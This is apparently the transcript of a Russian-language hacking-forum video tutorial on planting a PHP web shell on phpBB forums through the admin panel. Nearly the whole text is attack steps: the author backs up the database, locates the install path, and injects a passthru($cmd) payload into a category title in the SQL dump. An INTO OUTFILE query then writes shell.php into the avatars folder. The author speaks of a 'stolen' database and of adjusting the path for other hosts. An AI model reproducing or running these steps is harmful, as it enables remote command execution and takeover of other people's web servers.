Как залить шелл на форумы phpBB. Video.antichat - Grrl
У вашего броузера проблема в совместимости с HTML5
Привет)) меня зовут Grrl счас я покажу как залить шелл
на форумы phpBB на примере локалхоста))))
для начала идем а админку и делаем полную копию базы данных
отлично))) теперь нам нужно узнать установочную директорию форума)))
/admin/admin_disallow.php?setmodules=1
вот тут он и находится)
а теперь подправим сворованную базу данных))
находим такую строку
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', 'test', '10');
и заменяем ее на следующее
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', ' ? passthru("$cmd"); ? ', '10');
SELECT cat_title INTO OUTFILE '/home/test2.ru/www/phpbb/images/avatars/shell.php' FROM phpbb_categories where cat_id=1;
UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1;
здесь придется подправить когда будешь заливать на другой хосст))
можно мыло бы попробовать залить и в chace но посмотрим туда вначале
поэтому заливаем в папку аватарок (если туда разрешенна запись кстественно)
восстававливаем базу
база востановленна)))
теперь проверяем наш шел
он как видим работает ))))
всё!!!!!
http://forum.antichat.ru